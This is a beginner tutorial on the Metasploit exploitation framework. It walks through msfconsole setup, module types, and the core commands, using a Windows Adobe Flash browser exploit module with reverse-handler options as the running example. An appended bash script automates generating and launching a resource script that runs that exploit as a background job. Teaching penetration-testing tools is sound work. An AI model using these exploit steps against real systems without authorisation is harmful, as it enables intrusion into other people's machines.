Metasploit is the world’s leading exploitation framework. It is used, to some extent, by nearly every hacker/pentester. As such, you really need to become familiar with it if you want to enter and prosper in this burgeoning field.
Originally developed by HD Moore as an open-source project, it is now owned by the security company, Rapid7 (Rapid7 also owns the vulnerability scanner, Nexpose). Although originally developed as an open-source project, Rapid7 has now developed a Pro version of Metasploit with a few more “bells and whistles”. Fortunately, the open-source, community-edition is still available to the rest of us without the tens of thousands of dollars to spend on the Pro version (if you are a professional pentester, the efficiency and time savings accrued in using the Pro version make it a good investment).
Metasploit has multiple interfaces including:
(1) msfconsole – an interactive command-line like interface
(2) msfcli – a literal Linux command line interface (retired from the framework in 2015; the same one-shot use is now done with msfconsole -x "commands" or a resource script via msfconsole -r)
(3) Armitage – a GUI-based third party application
(4) msfweb – browser based interface (no longer shipped with the open-source framework; the Pro edition provides the web UI)
Undoubtedly, the most common way to use Metasploit is through Metasploit’s own interactive shell, msfconsole. In this tutorial, we will be largely using this msfconsole, but I will show you how to use the others in later tutorials.
In recent years, Metasploit has integrated additional tools to make it more than just an exploitation framework. Tools such as nmap and Nexpose are now integrated into Metasploit, so that the entire process, from port scanning through vulnerability scanning, exploitation and post-exploitation, can be done from one single tool. In addition, Metasploit now uses a PostgreSQL database to store the data collected from your scans and exploits.
II. Getting Started
Before we start Metasploit, we should start the PostgreSQL database. Metasploit will work without it, but the database enables Metasploit to run faster module searches and to store the hosts, services, credentials and sessions you collect while scanning and exploiting.
Start the PostgreSQL database before starting Metasploit by typing;
kali > service postgresql start
(On current Kali releases, where you no longer log in as root, the first-time setup is sudo msfdb init, which starts PostgreSQL and creates the msf database and user for you.)
Once the database has been started, you can start the Metasploit Framework console by typing;
kali > msfconsole
As Metasploit loads all of its modules into RAM, it takes a while, so be patient. Eventually, you should get a screen that looks like this.
Don't worry if it doesn't look exactly the same as my screen above, as Metasploit rotates the opening splash images. As long as you have the msf > prompt, you are in the right place.
This starts the Metasploit console. If you are more GUI oriented, you can go Applications–>Exploitation Tools–> metasploit framework.
III. Metasploit Keywords
Although Metasploit is a very powerful exploitation framework, just a few keywords can get you started hacking just about any system.
Metasploit has six (6) types of modules: exploits, payloads, auxiliary, post, encoders and nops. (Metasploit 5 and later add a seventh type, evasion, but the six above are the ones you will use day to day.)
A word about terminology though before we start. In Metasploit terminology, an exploit is a module that takes advantage of a system or application vulnerability. It usually will attempt to place a payload on the system. This payload can be a simple command shell or the all-powerful Meterpreter. Outside Metasploit, the attacker-side component that waits for a payload to connect back is usually called a listener or handler; the payload itself is not a rootkit (it does not hide itself from the operating system), so don't let the two terms blur together. I will do a tutorial on each of these types of modules in the near future.
Let’s take a look at some of those keyword commands. We can get a list of commands by typing help.
msf > help
Note that we can access this help menu with the “?” as well as “help”.
msf > use
The “use” command loads a module. So, for instance, if I wanted to load the exploit/windows/browser/adobe_flash_avm2 module (this is an exploit that takes advantage of one of the many vulnerabilities in the Adobe Flash plug-in), I would type;
msf > use exploit/windows/browser/adobe_flash_avm2
As you can see above, when Metasploit successfully loads the module, it responds with the type of module (exploit) and the abbreviated module name in red.
After you load a module, the show command can be very useful to gather more information on the module. The three “show” commands I use most often are “show options”, “show payloads” and “show targets”. Let’s take a look at “show payloads” first.
msf > show payloads
This command, when used after selecting your exploit, will show you all the payloads that are compatible with this exploit. If you run this command before selecting an exploit, it will show you ALL payloads, a VERY long list.
As you see in the screenshot above, the show payloads command listed all the payloads that will work with this exploit.
msf > show options
This command is also very useful in running an exploit. It will display all of the options that need to be set before running the module, with the Required column telling you which ones you cannot leave blank. These options include such things as IP addresses, URI path, the port, etc.
msf > show targets
A less commonly used command is “show targets”. Each exploit has a list of the targets it will work against. By using the “show targets” command, we can get a list of them. In this case, targeting is automatic, but some exploits have as many as 100 different targets and success will often depend upon selecting the correct one. These targets can be defined by operating system, service pack and language, among other things.
msf > info
The info command is simple. When you type it after you have selected a module, it shows you key information about the module, including the options that need to be set, the amount of payload space (more about this in the payloads section), the references for the vulnerability, and a description of the module. I almost always run it after selecting my exploit.
msf > search
As a newcomer to Metasploit, the “search” command might be the most useful. When Metasploit was small and new, it was relatively easy to find the right module you needed. Now, with over 3000 modules, finding just the right module can be time-consuming and problematic. Rapid7 added the search function starting with version 4 and it has become a time- and life-saver.
Although you can use the search function to search for keywords, that approach is not always efficient as it will often return a VERY large result set.
To be more specific in your search, you can use the following keywords.
platform – this is the operating system that the module is built for
type – this is the type of module. These include exploits, nops, payloads, post, encoders and auxiliary
name – if you know the name of the module you can search by its name
cve – the CVE identifier (year-number) of the vulnerability the module targets; newer versions also accept author, rank and others (see help search for the full list)
The syntax for using search is the keyword followed by a colon and then a value such as;
msf > search type:exploit
For instance, if you were looking for an exploit (type) for Windows (platform) for Adobe Flash, we could type;
msf > search type:exploit platform:windows flash
As you can see above, Metasploit searched its database for modules that were exploits for the Windows platform and included the keyword "flash".
msf > set
This command is used to set options within the module you selected. For instance, if we look above at the show options command, we can see numerous options that must be set, such as URIPATH, SRVHOST and SRVPORT (option names are case-insensitive, but the convention is upper case). We can set any of these with the set command such as;
msf > set SRVPORT 80
This changes the default SRVPORT (the port the exploit's web server listens on) from 8080 to 80.
msf > unset
This command, as you might expect, unsets the option that was previously set. Such as;
msf > unset SRVPORT
As you can see, we first set the SRVPORT variable to 80 and then unset it. It then reverted back to the default value of 8080 that we can see when we typed show options again.
msf > exploit
Once we have loaded our exploit and set all the necessary options, the final action is “exploit”. This sends the exploit to the target system and, if successful, installs the payload.
As you can see in this screenshot, the exploit starts and is running as a background job with a reverse handler on port 4444 (the default LPORT of the reverse payload). It then started a web server on host 0.0.0.0 on port 80 with a randomized URL (F5pmyl9gCHVGw90). We could have chosen a specific URL and set it by changing the URIPATH variable with the set command.
msf > back
We can use the back command to take us "back" one step in our process. So, for instance, if we decided that we did not want to use the exploit/windows/browser/adobe_flash_avm2 exploit, we could type "back" and it would unload the exploit and return us to the plain msf > prompt.
msf > exit
The exit command, as you would expect, exits us from msfconsole and back into the BASH command shell.
Notice that in this case, it also stopped the web server and the handler that we created in this exploit before returning us to the Kali command prompt in the BASH shell.
In many exploits, you will see the following options (variables).
RHOST – this is the remote host or target IP
LHOST – this is the local host or attacker IP
RPORT – this is the remote port or target port
LPORT – this is the local port or attacker port
These can all be set by using the set command followed by the variable name (RHOST, for instance) and then the value.
msf > set RHOST 126.96.36.199
Note that in Metasploit 5 and later most modules take RHOSTS (plural) instead of RHOST, and it accepts a single IP, a range, a CIDR block or a file:/path list of targets; show options will tell you which name the module expects.
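The whole sequence above (start the database, use a module, set its options, exploit as a background job) can be driven without typing at the msf > prompt, using a Metasploit resource script run with msfconsole -r. The script below is an added example written for this tutorial, not code from the original page or from the Metasploit project. It assumes a Kali-style host where msfconsole, pg_isready and service are on the PATH; the LHOST value 192.0.2.10 and the /update URI in the usage comment are placeholders you must replace with your own.

```shell
#!/usr/bin/env bash
# Added example (not part of the original tutorial): build and run a
# Metasploit resource (.rc) script for the use / set / exploit sequence.
# Assumptions: msfconsole, pg_isready and service exist on the host.
set -eu

# Emit the msfconsole commands for one module as a resource script.
# $1 = module path, remaining args = NAME=VALUE option pairs.
# Each option becomes a `set` line; `exploit -j` runs the module as a
# background job, which is what the exploit output on the page shows.
gen_rc() {
  local module="$1"; shift
  printf 'use %s\n' "$module"
  local kv
  for kv in "$@"; do
    printf 'set %s %s\n' "${kv%%=*}" "${kv#*=}"
  done
  printf 'show options\n'
  printf 'exploit -j\n'
}

# Refuse to build a script that leaves a required option unset or empty.
# Metasploit would also refuse at `exploit` time, but catching it here
# avoids discovering the mistake halfway through a resource run.
# $1 = space-separated required option names, remaining args = NAME=VALUE.
check_required() {
  local required="$1"; shift
  local name kv found
  for name in $required; do
    found=0
    for kv in "$@"; do
      [ "${kv%%=*}" = "$name" ] && [ -n "${kv#*=}" ] && found=1
    done
    [ "$found" -eq 1 ] || { echo "missing required option: $name" >&2; return 1; }
  done
  return 0
}

# Start PostgreSQL if it is not already accepting connections, then run the
# generated script. `msfconsole -q -r FILE` (quiet, resource file) is the
# non-interactive entry point; `-x "cmd1; cmd2"` takes the same commands inline.
launch_msf() {
  local rc="$1"
  pg_isready -q 2>/dev/null || sudo service postgresql start
  msfconsole -q -r "$rc"
}

# Usage (not run automatically): the Flash browser exploit from the page,
# served on port 80 as in the `set SRVPORT 80` step. 192.0.2.10 and /update
# are placeholders.
#   opts="SRVHOST=0.0.0.0 SRVPORT=80 URIPATH=/update LHOST=192.0.2.10"
#   check_required "SRVHOST SRVPORT LHOST" $opts
#   gen_rc exploit/windows/browser/adobe_flash_avm2 $opts > /tmp/flash.rc
#   launch_msf /tmp/flash.rc
```

Generating the script and checking the required options before launching is the part worth copying: a resource file is easy to review, version and hand to a colleague, and it reproduces exactly the commands this tutorial walked through interactively.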
Although this is less than an exhaustive list of Metasploit commands, with just these commands you should be able to execute most of the functions in Metasploit. When you need another command in this course, I will take a few minutes to introduce it, but these are all you will likely need, for now.